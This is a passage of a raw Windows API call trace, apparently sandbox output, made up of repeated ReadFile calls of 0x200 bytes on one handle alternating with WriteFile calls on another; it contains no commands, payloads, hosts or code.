[0022.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.315] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.316] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.318] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.319] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.321] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.323] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.325] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.326] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.327] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.329] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.331] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.333] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.335] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.338] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.339] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.341] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.358] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.360] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.361] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.364] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.365] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.367] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.368] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.371] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, 